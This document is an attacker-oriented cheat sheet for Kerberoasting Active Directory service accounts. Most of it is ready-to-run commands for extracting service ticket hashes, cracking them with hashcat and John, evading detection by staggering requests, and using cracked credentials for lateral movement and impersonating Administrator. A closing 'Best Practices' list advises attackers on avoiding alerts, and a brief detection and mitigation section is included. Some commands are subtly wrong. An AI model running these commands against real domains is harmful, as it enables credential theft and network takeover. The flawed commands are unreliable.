Kerberoasting

Kerberoasting attacks request service tickets (TGS) for user accounts with Service Principal Names (SPNs) and crack them offline to recover cleartext passwords.

Vulnerability Mechanics

• Target: Service accounts with SPNs registered in AD
• Method: Request TGS ticket (no elevated privileges required)
• Weakness: TGS encrypted with service account password (RC4-MD5)
• Impact: Offline password cracking of service accounts
• Prevalence: ~30-50% of domain service accounts vulnerable

SPN Discovery

Finding Roastable SPNs

# GetUserSPNs.py (Impacket)
python3 GetUserSPNs.py DOMAIN.LOCAL/user:password -dc-ip 192.168.1.100

# Rubeus
Rubeus.exe kerberoast /nowrap

# PowerView (PowerShell)
Get-DomainUser -SPN | Select-Object samAccountName, servicePrincipalName

# LDAP query
ldapsearch -x -H ldap://192.168.1.100 \
  -b "DC=domain,DC=local" \
  "servicePrincipalName=*" \
  samAccountName servicePrincipalName

SPN Format Examples

MSSQLSvc/server.domain.local:1433
HTTP/webapp.domain.local
LDAP/dc.domain.local
CIFS/fileserver.domain.local

TGS Extraction Methods

Impacket (GetUserSPNs.py)

# Extract TGS hashes for all SPNs
python3 GetUserSPNs.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password -request -output tgs_hashes.txt

# Extract specific service
python3 GetUserSPNs.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password -spn "MSSQLSvc/*"

# Extract single user
python3 GetUserSPNs.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password -request -user mssql_service

# Format for hashcat
python3 GetUserSPNs.py -dc-ip 192.168.1.100 DOMAIN.LOCAL/user:password -request -request-user mssql_svc -format hashcat -output hashes.txt

Rubeus

# Extract all TGS hashes
Rubeus.exe kerberoast /format:john /outfile:hashes.txt

# Roast specific service type
Rubeus.exe kerberoast /spn:"MSSQLSvc/*" /format:john

# Target specific user
Rubeus.exe kerberoast /user:mssql_service /format:john

# Roast and crack immediately
Rubeus.exe kerberoast /format:john | hashcat -m 13100 - wordlist.txt

# No wrap for easy cracking
Rubeus.exe kerberoast /format:john /nowrap /outfile:hashes.txt

PowerShell (Invoke-Kerberoast)

# Extract all roastable SPNs
Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv roasted.csv

# Target specific service
Invoke-Kerberoast -SPN "MSSQLSvc/*" -OutputFormat Hashcat

# Target by computer
Invoke-Kerberoast -Computer "fileserver" -OutputFormat Hashcat

# Save to file
Invoke-Kerberoast -OutputFormat Hashcat | Out-File hashes.txt

TGS Ticket Cracking

Hashcat

# Kerberoast hash mode: -m 13100
# Supported: RC4-HMAC, AES, DES

# Dictionary attack
hashcat -m 13100 hashes.txt wordlist.txt -w 3

# Rule-based attack
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# Brute force (specific pattern)
hashcat -m 13100 hashes.txt -a 3 -1 ?d ?l?l?l?d?d?d?d
# Pattern: 3 letters + 4 digits

# Mask attack with custom character set
hashcat -m 13100 hashes.txt -a 3 -1 ?l?d ?1?1?1?1?1?1?1?1

# GPU acceleration
hashcat -m 13100 hashes.txt wordlist.txt -d 1 --workload-profile 4

# Track progress
hashcat -m 13100 hashes.txt wordlist.txt --status

John the Ripper

# Format identification
john --list=formats | grep -i krb

# Dictionary attack
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt

# Incremental cracking
john --format=krb5tgs hashes.txt --incremental

# Show results
john hashes.txt --show --format=krb5tgs

# Wordlist with rules
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt --rules

Large-Scale Attacks

Batch Kerberoasting

#!/bin/bash
# Mass kerberoast operation

# Extract all hashes
python3 GetUserSPNs.py -dc-ip 192.168.1.100 -format hashcat DOMAIN.LOCAL/user:password -request -output kerberoast.txt

# Count targets
wc -l kerberoast.txt

# Crack with multiple wordlists
for wordlist in wordlist_*.txt; do
    hashcat -m 13100 kerberoast.txt $wordlist -o results.txt
done

# Results
cat results.txt | tee cracked.txt

Distributed Cracking

# Split hashes
split -n l/4 hashes.txt hashes_chunk_

# Machine 1
hashcat -m 13100 hashes_chunk_aa wordlist.txt -o out_1.txt

# Machine 2-4 (same for other chunks)
hashcat -m 13100 hashes_chunk_ab wordlist.txt -o out_2.txt

# Combine results
cat out_*.txt > final_cracked.txt

Advanced Exploitation

Shadow Credentials Attack

# After cracking service account password:
# 1. Add shadow credential to computer object
# 2. Authenticate as computer account
# 3. Request TGT for service account

python3 shadow_credentials.py -account mssql_service_$ -dc-ip 192.168.1.100 -add-certificate

Constrained Delegation Abuse

# Kerberoast service account with delegation rights
# 1. Extract TGS -> crack password
# 2. Authenticate as service account
# 3. Request TGT for admin account
# 4. Use TGT for lateral movement

Rubeus.exe kerberoast /user:service_with_delegation
# Crack password
# Use password for constrained delegation attack

Ticket Modification

# Using valid service account password:
# 1. Request valid TGS
# 2. Modify ticket (add admin groups, extend expiration)
# 3. Inject modified ticket

Rubeus.exe asktgs /ticket:tgs_ticket /service:cifs/target

Evasion Techniques

Stealth Kerberoasting

# Use alternate tools to blend in
# - Built-in PowerShell (invoke-kerberoast)
# - Legitimate admin tools
# - Spread requests over time

# Stagger requests (5 minute intervals)
for spn in $(python3 GetUserSPNs.py DOMAIN.LOCAL/user:pass | cut -d' ' -f2); do
    python3 GetUserSPNs.py -spn "$spn" DOMAIN.LOCAL/user:pass
    sleep 300
done

Live Off the Land

# Pure PowerShell (no external tools)
$searcher = New-Object DirectoryServices.DirectorySearcher
$searcher.Filter = "(servicePrincipalName=*)"
$searcher.FindAll() | % { $_.Properties.serviceprincipalname }

# Add Service Ticket Request
# (Built-in Windows API, no imported DLLs)

Reconnaissance

Identify High-Value Targets

# SPNs associated with critical services
python3 GetUserSPNs.py DOMAIN.LOCAL/user:pass | grep -E "LDAP|CIFS|MSSQLSvc|HTTP"

# Service accounts in admin groups
Get-ADUser -Filter {servicePrincipalName -like "*"} | Get-ADGroup -Filter {*} | Where-Object {$_.Name -match "Admin"}

# Long-running services (weak password likelihood)
Get-Service | Where-Object {$_.Status -eq 'Running'} | Select-Object ServiceName, DisplayName

Target Prioritization

1. Critical Services: LDAP, CIFS, MSSQL, Exchange
2. Weak Password Services: Long-running, old accounts
3. Delegation Rights: Can lead to escalation
4. Domain-wide Access: Services running as SYSTEM/DOMAIN_ADMIN

Post-Cracking

Using Service Account Credentials

# Verify credentials work
python3 psexec.py DOMAIN.LOCAL/service_account:password@target.local

# Lateral movement
psexec.exe \\target -u DOMAIN\service_account -p password cmd.exe

# Check permissions on critical systems
net use \\fileserver /U:DOMAIN\service_account password
dir \\fileserver\sensitive_share

# LDAP enumeration with elevated account
ldapsearch -x -H ldap://dc.local -b "DC=domain,DC=local" \
  -D "DOMAIN\service_account" -w password "(objectClass=user)"

Privilege Escalation Paths

# Service account in Domain Admins
Rubeus.exe ptt /ticket:tgt_ticket

# Service account with delegation rights
Rubeus.exe s4u /user:service_account /password:password /impersonate:Administrator

# Service account with share access
psexec.exe -u DOMAIN\service_account -p password \\fileserver cmd.exe

Detection & Mitigation

Detection

# Monitor TGS requests (EventID 4769)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4769)]]" |
  Where-Object {$_.Message -match "User Account Name"} |
  Select-Object TimeCreated, Message

# Identify RC4 encryption (weak)
Get-WinEvent -LogName Security -FilterXPath "*[System[(EventID=4769)]]" |
  Where-Object {$_.Message -match "Encryption Type.*RC4"} | Measure-Object

Mitigation

# Enable AES encryption for services
Set-ADServiceAccount -Identity mssql_service -KerberosEncryptionType AES128,AES256

# Use strong passwords (32+ characters)
Set-ADAccountPassword -Identity mssql_service -NewPassword (ConvertTo-SecureString -AsPlainText -Force "NewPassword123!@#$%^&*()")

# Move services to managed service accounts (gMSA)
New-ADServiceAccount -Name gMSA_Service -DNSHostName server.domain.local

# Disable RC4 in Kerberos policy
gpresult -h report.html  # Check current policy
# Group Policy: Computer Config > Security Settings > Kerberos Policy

Tools Comparison

Tool	Language	Output Format	Speed	Detection
GetUserSPNs.py	Python	Native, Hashcat, John	Fast	Low
Rubeus	C#	John, Hashcat	Very Fast	Medium
Invoke-Kerberoast	PowerShell	CSV	Medium	Medium

Performance Tuning

# Hashcat optimal settings
hashcat -m 13100 hashes.txt wordlist.txt \
  -w 4 \           # Workload profile (1-4)
  -O \             # Optimize for speed (reduced accuracy)
  --kernel-accel=64 \  # GPU acceleration
  -d 1,2           # Devices (GPU 1, GPU 2)

# Multi-GPU cracking
hashcat -m 13100 hashes.txt wordlist.txt -d 1,2,3,4

# CPU fallback
hashcat -m 13100 hashes.txt wordlist.txt --workload-profile 1

Best Practices

• Kerberoast during business hours (normal TGS traffic)
• Target service accounts with weaker passwords
• Use legitimate admin tools for execution
• Monitor for alerts but expect minimal detection
• Combine with other attacks (AS-REP, delegation)
• Crack aggressively (GPU, distributed, multiple wordlists)

References

• GetUserSPNs.py
• Rubeus
• Kerberoasting in Depth
• Hashcat 13100 Mode